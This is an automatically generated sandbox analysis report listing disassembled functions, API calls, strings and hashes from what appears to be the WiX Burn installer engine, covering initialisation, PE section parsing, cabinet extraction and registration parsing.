Part of subcall function 000C120A: GetLastError.KERNEL32(?,?,?,000C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 000C1252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 000C5285

Part of subcall function 00100E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00100E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 000C5317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 000C5321
CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C558E

Strings

Failed to initialize Wiutil., xrefs: 000C52E1
3.11.1.2318, xrefs: 000C5384
Failed to initialize Regutil., xrefs: 000C52C9
Failed to initialize COM., xrefs: 000C5291
Failed to initialize engine state., xrefs: 000C526C
Failed to get OS info., xrefs: 000C534F
engine.cpp, xrefs: 000C5345
Failed to run per-user mode., xrefs: 000C5494
Failed to run embedded mode., xrefs: 000C5444
Failed to initialize Cryputil., xrefs: 000C52A6
Failed to initialize XML util., xrefs: 000C52F9
Failed to run per-machine mode., xrefs: 000C546C
Failed to initialize core., xrefs: 000C53C3
Failed to run RunOnce mode., xrefs: 000C541C
Failed to run untrusted mode., xrefs: 000C54B6
Failed to parse command line., xrefs: 000C5245
Invalid run mode., xrefs: 000C53F9

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
API String ID: 3262001429-510904028
Opcode ID: 3b6ea5725a91cbf10c3535665392e76ce280da794def26d3d32fe15f4d89876f
Instruction ID: 6a5e2867c6d584c491a736fa551d90090d4858f9670667d5a88da297050ea458
Opcode Fuzzy Hash: 3b6ea5725a91cbf10c3535665392e76ce280da794def26d3d32fe15f4d89876f
Instruction Fuzzy Hash: FDB1C675D40A299BDB31AB54CC96FED76B4AF44312F000199F948B7282DB71AEC0CF91

Function 0010304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00103609,00000000,?,00000000), ref: 00103069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000EC025,?,000C5405,?,00000000,?), ref: 00103075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 001030B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001030C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 001030CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001030D6
CoCreateInstance.OLE32(0012B6B8,00000000,00000001,0010B818,?,?,?,?,?,?,?,?,?,?,?,000EC025), ref: 00103111
ExitProcess.KERNEL32 ref: 001031C0

Strings

kernel32.dll, xrefs: 00103059
Wow64DisableWow64FsRedirection, xrefs: 001030BB
IsWow64Process, xrefs: 001030AF
Wow64RevertWow64FsRedirection, xrefs: 001030CE
xmlutil.cpp, xrefs: 00103099
Wow64EnableWow64FsRedirection, xrefs: 001030C3

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: 9f5dd0d4b05dd6610c2c1a27db430b461fe1cf88771e7905bf39d8bca83d0e2d
Instruction ID: a2c26791042818cc07bb08e34f1bc746eeae8031b84aa3f0758a8c4049459d9d
Opcode Fuzzy Hash: 9f5dd0d4b05dd6610c2c1a27db430b461fe1cf88771e7905bf39d8bca83d0e2d
Instruction Fuzzy Hash: 3241C631A05225ABDB24DBA8C885BAEB7B8EF48710F114069F951E72D0DBB1DE408B90

Function 000C1070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000C10DD,?,00000000), ref: 000C33E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 000C10F6

Part of subcall function 000C1175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,000C111A,cabinet.dll,00000009,?,?,00000000), ref: 000C1186
Part of subcall function 000C1175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,000C111A,cabinet.dll,00000009,?,?,00000000), ref: 000C1191
Part of subcall function 000C1175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000C119F
Part of subcall function 000C1175: GetLastError.KERNEL32(?,?,?,?,?,000C111A,cabinet.dll,00000009,?,?,00000000), ref: 000C11BA
Part of subcall function 000C1175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000C11C2
Part of subcall function 000C1175: GetLastError.KERNEL32(?,?,?,?,?,000C111A,cabinet.dll,00000009,?,?,00000000), ref: 000C11D7

CloseHandle.KERNELBASE(?,?,?,?,0010B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 000C1131

Strings

wininet.dll, xrefs: 000C10AE
clbcatq.dll, xrefs: 000C10BC
feclient.dll, xrefs: 000C10D1
cabinet.dll, xrefs: 000C1099, 000C1114
version.dll, xrefs: 000C10A7
msasn1.dll, xrefs: 000C10C3
comres.dll, xrefs: 000C10B5
crypt32.dll, xrefs: 000C10CA
msi.dll, xrefs: 000C10A0

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: 19e15bf9402009ee1de3bc7683ee0634d03280df833db799c9310cc5bf0010fa
Instruction ID: 902f6d0ed001048d4ed64bad50bf99c544540eb1977f0487318e1f9857a04464
Opcode Fuzzy Hash: 19e15bf9402009ee1de3bc7683ee0634d03280df833db799c9310cc5bf0010fa
Instruction Fuzzy Hash: 4A217F7190021CABDB109FA4DD89FEEBBB8EF09710F544119FA51B72C2D7B45A44CBA0

Function 000DA0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to calculate working folder to ensure it exists., xrefs: 000DA0D8
Failed to copy working folder., xrefs: 000DA116
Failed create working folder., xrefs: 000DA0EE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: f40b88ea0eac0f058ce1dd0efa92d5676b277b882e5bfcd35b583b631aa72ea5
Instruction ID: 0fe298fbed282c7354a7cf8fc0254d0c88926fec404ea86a9ac1067f964f7d44
Opcode Fuzzy Hash: f40b88ea0eac0f058ce1dd0efa92d5676b277b882e5bfcd35b583b631aa72ea5
Instruction Fuzzy Hash: 4B018432A05728FA8F325B55DC06D9EBBB9DF55B20B104266F8007A311DB769E40E6A1

Function 000F48D8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,000F48AE,00000000,00127F08,0000000C,000F4A05,00000000,00000002,00000000), ref: 000F48F9
TerminateProcess.KERNEL32(00000000,?,000F48AE,00000000,00127F08,0000000C,000F4A05,00000000,00000002,00000000), ref: 000F4900
ExitProcess.KERNEL32 ref: 000F4912

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3b3b5cb37fbf2efbf80301cb695106c41817695d449b5823f061a75d967d7d68
Instruction ID: 708d99489971b2e2ac07a0d9803f4469d717247a80488c20c5b1eaab439d6b4b
Opcode Fuzzy Hash: 3b3b5cb37fbf2efbf80301cb695106c41817695d449b5823f061a75d967d7d68
Instruction Fuzzy Hash: A2E0863110410CAFCF116F64DD4899A3B69FF40381F004010FE554B932CBB5DC82DB80

Function 000C394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 4f198eeb8b6afa4a5afc7030b51869f4c08ca2b96e2489866e8dd74b3778a1d9
Instruction ID: ea2115b9dfac62b73eb45fe986f0c8631e94ba213bcce3620df175c967e9b10e
Opcode Fuzzy Hash: 4f198eeb8b6afa4a5afc7030b51869f4c08ca2b96e2489866e8dd74b3778a1d9
Instruction Fuzzy Hash: 39C012321A820CABCB006FF8EC8EC9A3BACBB2C6027088400B945C2520C778E0908B60

Function 000CF9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get @AboutUrl., xrefs: 000CFC4E
Version, xrefs: 000CFA91
Failed to get @PerMachine., xrefs: 000CFB25
Department, xrefs: 000CFE77
Failed to get @ProviderKey., xrefs: 000CFAE6
UpdateUrl, xrefs: 000CFC5C
Invalid modify disabled type: %ls, xrefs: 000CFD94
Failed to get @Tag., xrefs: 000CFA6A
Failed to get @HelpLink., xrefs: 000CFC04
HelpTelephone, xrefs: 000CFC12
Failed to set registration paths., xrefs: 000CFF08
ParentDisplayName, xrefs: 000CFC81
Failed to select ARP node., xrefs: 000CFB4F
Publisher, xrefs: 000CFBC8
Failed to get @HelpTelephone., xrefs: 000CFC29
Failed to get @UpdateUrl., xrefs: 000CFC73
Failed to parse @Version: %ls, xrefs: 000CFAC5
DisableModify, xrefs: 000CFCF6
Failed to select Update node., xrefs: 000CFE3C
AboutUrl, xrefs: 000CFC37
Failed to select registration node., xrefs: 000CFA1C
Classification, xrefs: 000CFEE2
Arp, xrefs: 000CFB33
Comments, xrefs: 000CFCA9
Tag, xrefs: 000CFA57
registration.cpp, xrefs: 000CFD87
Failed to get @DisableRemove., xrefs: 000CFDE0
Failed to parse software tag., xrefs: 000CFE10
Name, xrefs: 000CFEC1
Failed to get @Version., xrefs: 000CFAA4
PerMachine, xrefs: 000CFB12
button, xrefs: 000CFD15
Failed to parse related bundles, xrefs: 000CFA83
Failed to get @DisplayVersion., xrefs: 000CFBBA
Failed to get @Register., xrefs: 000CFB70
Update, xrefs: 000CFE1E
Registration, xrefs: 000CF9FD
Register, xrefs: 000CFB5D
yes, xrefs: 000CFD36
Failed to get @ExecutableName., xrefs: 000CFB07
ProductFamily, xrefs: 000CFE9C
DisplayVersion, xrefs: 000CFBA3
ProviderKey, xrefs: 000CFAD3
Failed to get @Manufacturer., xrefs: 000CFE66
Failed to get @Name., xrefs: 000CFED4
ExecutableName, xrefs: 000CFAF4
Failed to get @DisplayName., xrefs: 000CFB95
Failed to get @DisableModify., xrefs: 000CFDB8
Failed to get @Contact., xrefs: 000CFCE8
Failed to get @Department., xrefs: 000CFE8E
Failed to get @Id., xrefs: 000CFA49
Contact, xrefs: 000CFCD1
Failed to get @ParentDisplayName., xrefs: 000CFC98
DisplayName, xrefs: 000CFB7E
Failed to get @Publisher., xrefs: 000CFBDF
Failed to get @Classification., xrefs: 000CFEF5
Failed to get @ProductFamily., xrefs: 000CFEB3
DisableRemove, xrefs: 000CFDC9
HelpLink, xrefs: 000CFBED
Failed to get @Comments., xrefs: 000CFCC0
Manufacturer, xrefs: 000CFE53

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
API String ID: 760788290-2956246334
Opcode ID: 554c66888d90d92aa3b3762a96066f4a9a723a2fc277aafd9469ad2d409f4cb4
Instruction ID: d560cbbc1e76fa8ec1f919c4ee97686d8cb195b2d6caa364c99fb37e7f3385bb
Opcode Fuzzy Hash: 554c66888d90d92aa3b3762a96066f4a9a723a2fc277aafd9469ad2d409f4cb4
Instruction Fuzzy Hash: 1AE1D632E44627BBCB2697A0CC42FFDE6A6AF15710F110239FE21F7191DBA15D4096D2

Function 000CB48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7765C3F0,00000000), ref: 000CB502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB550
GetLastError.KERNEL32(?,?,?,00000000,7765C3F0,00000000), ref: 000CB556
ReadFile.KERNELBASE(00000000,000C4461,00000040,?,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB59E
GetLastError.KERNEL32(?,?,?,00000000,7765C3F0,00000000), ref: 000CB5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB656
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB7BD

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 000CB906

Strings

Failed to allocate memory for container sizes., xrefs: 000CBAD3
burn, xrefs: 000CB838
Failed to allocate buffer for section info., xrefs: 000CB8E4
Failed to read section info, data to short: %u, xrefs: 000CB8AA
.wix, xrefs: 000CB830
Failed to read DOS header., xrefs: 000CB5CF
Failed to read complete image section header, index: %u, xrefs: 000CBB75
Failed to get total size of bundle., xrefs: 000CBA23
Failed to find valid NT image header in buffer., xrefs: 000CBBD0
Failed to seek to section info., xrefs: 000CB6F8, 000CB934
Failed to open handle to engine process path., xrefs: 000CB52D
Failed to read NT header., xrefs: 000CB681
Failed to find Burn section., xrefs: 000CBB32
(, xrefs: 000CB81D
Failed to read signature size., xrefs: 000CB796
Failed to read image section header, index: %u, xrefs: 000CBBAC
4, xrefs: 000CB884
PE, xrefs: 000CB698
Failed to seek past optional headers., xrefs: 000CB7EB
Failed to read section info., xrefs: 000CB999
PE Header from file didn't match PE Header in memory., xrefs: 000CBB11
section.cpp, xrefs: 000CB523, 000CB577, 000CB5C5, 000CB628, 000CB677, 000CB6EE, 000CB73D, 000CB78C, 000CB7E1, 000CB898, 000CB8D8, 000CB92A, 000CB98F, 000CB9B9, 000CB9E0, 000CBAC7, 000CBB07, 000CBB26, 000CBB63, 000CBBA1, 000CBBC4, 000CBBDF
Failed to seek to NT header., xrefs: 000CB632
Failed to read signature offset., xrefs: 000CB747
Failed to read complete section info., xrefs: 000CB9C5
Failed to find valid DOS image header in buffer., xrefs: 000CBBEB
Failed to seek to start of file., xrefs: 000CB581
Failed to read section info, unsupported version: %08x, xrefs: 000CB9F5

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
API String ID: 3411815225-695169583
Opcode ID: aaa0801b398b19f2c2f34dbbe13e534d93ce9cb49527b397f219f1a00cecd987
Instruction ID: f280976b7fdaa71c690d104f0b7b6815c11052529054abf5af935eb9ab567bdb
Opcode Fuzzy Hash: aaa0801b398b19f2c2f34dbbe13e534d93ce9cb49527b397f219f1a00cecd987
Instruction Fuzzy Hash: 2412A276A40639ABDB309B55CC46FAF7AE4AF04710F1142ADFD44BB281DBB19D408BE1

Function 000E0D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,000E08BC,?,?), ref: 000E0D25
GetLastError.KERNEL32(?,?,?,?,000E08BC,?,?), ref: 000E0D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,000E08BC,?,?), ref: 000E0D74
GetLastError.KERNEL32(?,?,?,?,000E08BC,?,?), ref: 000E0D7F
ResetEvent.KERNEL32(?,?,?,?,?,000E08BC,?,?), ref: 000E0DB7
GetLastError.KERNEL32(?,?,?,?,000E08BC,?,?), ref: 000E0DC1

Strings

Failed to set file pointer to beginning of file., xrefs: 000E10D8
Failed to create file: %ls, xrefs: 000E1001
cabextract.cpp, xrefs: 000E0D53, 000E0DA3, 000E0DE5, 000E0E11, 000E0E94, 000E0EDC, 000E0F21, 000E0F89, 000E0FF4, 000E1045, 000E108A, 000E10CE
Failed to set operation complete event., xrefs: 000E0D5D, 000E0E9E
Invalid operation for this state., xrefs: 000E0E1D
Failed to set file pointer to end of file., xrefs: 000E104F
Failed to reset begin operation event., xrefs: 000E0DEF, 000E0F2B
Failed to wait for begin operation event., xrefs: 000E0DAD, 000E0EE6
Failed to copy stream name: %ls, xrefs: 000E0E50
Failed to set end of file., xrefs: 000E1094
Failed to allocate buffer for stream., xrefs: 000E0F93

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: ad4d8803047e37e37c9dfd3e97f02866b1c5e90e1a34554ae34332ea197798be
Instruction ID: ebec4e70d45e4dd0fa5edc499e8d4cf4591ead02f009d1122c5fa18f4dab9cf8
Opcode Fuzzy Hash: ad4d8803047e37e37c9dfd3e97f02866b1c5e90e1a34554ae34332ea197798be
Instruction Fuzzy Hash: F0912A37A856B2BFD73516A64D49FAF6990AF00B20F124635BE50BEAC1D7E1DCC082D1

Function 000C4D39 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000C10DD,?,00000000), ref: 000C33E8

CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 000C4F40
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 000C4F4F
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 000C4F5E
CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 000C4F69

Strings

Failed to cache to clean room., xrefs: 000C4DC2
burn.clean.room, xrefs: 000C4DDE
D, xrefs: 000C4EA9
burn.filehandle.self, xrefs: 000C4E45
%ls %ls, xrefs: 000C4E55
Failed to allocate full command-line., xrefs: 000C4E8E
"%ls" %ls, xrefs: 000C4E7A
Failed to wait for clean room process: %ls, xrefs: 000C4F23
Failed to append original command line., xrefs: 000C4E69
burn.filehandle.attached, xrefs: 000C4E17
engine.cpp, xrefs: 000C4EEA
Failed to get path for current process., xrefs: 000C4D83
-%ls="%ls", xrefs: 000C4DE6
Failed to append %ls, xrefs: 000C4E1C
Failed to launch clean room process: %ls, xrefs: 000C4EF7
Failed to allocate parameters for unelevated process., xrefs: 000C4DFA

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
